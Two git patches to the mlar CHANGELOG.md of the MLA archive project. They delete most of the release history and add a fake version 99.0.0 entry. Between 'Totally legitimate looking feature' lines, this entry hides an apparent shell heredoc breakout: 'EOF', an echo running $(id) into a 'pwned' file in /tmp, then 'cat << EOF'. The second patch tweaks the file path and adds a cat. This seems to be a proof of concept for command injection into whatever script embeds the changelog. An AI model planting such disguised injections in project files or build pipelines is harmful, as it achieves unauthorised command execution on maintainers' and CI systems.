From a85e33104e7b1c7d7616b89bd082bf5a1cf09481 Mon Sep 17 00:00:00 2001 From: commial Date: Tue, 31 Mar 2026 23:43:47 +0200 Subject: [PATCH 1/2] XXX --- mlar/CHANGELOG.md | 127 ++++------------------------------------------ 1 file changed, 10 insertions(+), 117 deletions(-) diff --git a/mlar/CHANGELOG.md b/mlar/CHANGELOG.md index 80844f75..02286da9 100644 --- a/mlar/CHANGELOG.md +++ b/mlar/CHANGELOG.md @@ -5,126 +5,19 @@ All notable changes to this project will be documented in this file. The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). -## [2.0.0] - 2026-02-16 - -### Added/Changed since 1.3.0 - -- MLA2 is now the default; it is **incompatible** with MLA1. MLA1 enters **low maintenance mode** -- Hybrid traditional/post-quantum encryption using **X25519 + ML-KEM1024** -- Archive signing using hybrid traditional/post-quantum signatures -- New archive format, enabling improved cryptographic and performance characteristics -- Cryptographic layer reworked to **protect against truncation attacks** -- Redesigned CLI for improved **simplicity, safety, and semver compatibility** -- Support for **authenticated truncated archive reading** -- Create archive from **stdin** input -- **Mark-of-the-Web (MotW)** propagation support -- Introduced `mlar-upgrader`: a tool to **upgrade MLA1 archives to MLA2 format** -- Added support for a shared-secret decryption advanced use case - -### Fixed since 1.3.0 - -- Limit dependencies by linking statically MSVC builds for Windows -- Fixed inappropriate default privileges on private key files - -### Added/Changed since 2.0.0-beta - -- Added a migration guide ( doc/src/MIGRATION.md ) -- Improved trust thanks to MLA security assessment (#465) -- Improved release transparency thanks to GitHub artifact attestation and reproducible builds -- Replace `-l` option with less error prone `--unencrypted` `--unsigned` and `--uncompressed` - -### Fixed since 2.0.0-beta - -- Fixed inappropriate default privileges on private key files - -## [2.0.0-beta] – 2025-12-20 - -### Added / Changed - -- Adapted `mlar` and `mlar-upgrader` to the TLV-based `KeyOpts`/`Opts` format -- Added and hardened `stdin`-based creation -- Improved CLI ergonomics -- Better error handling -- Optimize read/write paths with BufReader/BufWriter where appropriate -- [Advanced use case] HSM / shared-secret decryption: add an option to decrypt archives using a shared secret - -### Fixed - -- Limit dependencies by linking statically MSVC builds for Windows - -## [2.0.0-alpha] – 2025-08-01 - -### Added/Changed - -- MLA2 is now the default; it is **incompatible** with MLA1. MLA1 enters **low maintenance mode** -- Hybrid traditional/post-quantum encryption using **X25519 + ML-KEM1024** -- Archive signing using hybrid traditional/post-quantum signatures -- Switched to **Rust 2024 edition** -- New archive format, enabling improved cryptographic and performance characteristics -- Cryptographic layer reworked to **protect against truncation attacks** -- Redesigned APIs and CLI for improved **simplicity, safety, and semver compatibility** -- Support for **authenticated truncated archive reading** -- Create archive from **stdin** input -- **Mark-of-the-Web (MotW)** propagation support -- Introduced `mlar-upgrader`: a tool to **upgrade MLA1 archives to MLA2 format** +## [99.0.0] - 2026-03-31 -### Fixed +### Added -## [1.3.0] - 2023-10-06 +- Totally legitimate looking feature +EOF +echo "RCE_MARKER: Command execution achieved - $(id)" > /tmp/poc_sanitize_rce/pwned.txt +cat << 'EOF' +- Another legitimate looking feature -### Thanks - -- [Jean-Baptiste Galet](https://github.com/jbgalet) - -### Added/Changed - -- Bump dependencies -- Code cleaning -- Add more integration & CLI tests -- Behavior change: to avoid mistake, do not open unencrypted archive if a key is provided -- Add [key derivation capabilities](https://github.com/ANSSI-FR/MLA/pull/155) - -### Fixed - -- Reduce the number of call to `open`/`close` on linear extraction - -## [1.2.0] - 2021-10-01 - -### Thanks - -- [Nicolas Bordes](https://github.com/NicsTr) - -### Added/Changed - -- Recursive file-adding capability -- Bump dependencies - -## [1.1.1] - 2021-03-04 - -### Added/Changed - -- Bump dependencies - - In particular, update `mla` to running state, including a fix for [an issue](https://github.com/ANSSI-FR/MLA/issues/63) which may occurs in archive with more than 2^32 bits data - - -## [1.1.0] - 2020-09-14 - -### Thanks +## [2.0.0] - 2026-02-16 -- [sashaconway](https://github.com/sashaconway) -- [Jean-Baptiste Galet](https://github.com/jbgalet) +### Added/Changed since 1.3.0 -### Added/Changed +- MLA2 is now the default -- Switch from `ed25519_parser` to `curve25519-parser`: X25519 keys parsing capabilities -- `mlar to-tar`: - - Support for `-` output - - Sorted files -- New command, `mlar info`, to get an overview of an archive -- Typos -- Bump dependencies: - - `x25519-dalek`: 0 to 1 - - `hex`: 0.3 to 0.4 - - `assert_cmd`: 0.12 to 1.0 (dev) - - `assert_fs`: 0.13 to 1.0 (dev) - - `mla`: running state From 4954deda91746e5fd8f24e6c2506736c963653a7 Mon Sep 17 00:00:00 2001 From: commial Date: Tue, 31 Mar 2026 23:49:01 +0200 Subject: [PATCH 2/2] XXX --- mlar/CHANGELOG.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/mlar/CHANGELOG.md b/mlar/CHANGELOG.md index 02286da9..354d6857 100644 --- a/mlar/CHANGELOG.md +++ b/mlar/CHANGELOG.md @@ -11,7 +11,8 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 - Totally legitimate looking feature EOF -echo "RCE_MARKER: Command execution achieved - $(id)" > /tmp/poc_sanitize_rce/pwned.txt +echo "RCE_MARKER: Command execution achieved - $(id)" > /tmp/pwned.txt +cat /tmp/pwned.txt cat << 'EOF' - Another legitimate looking feature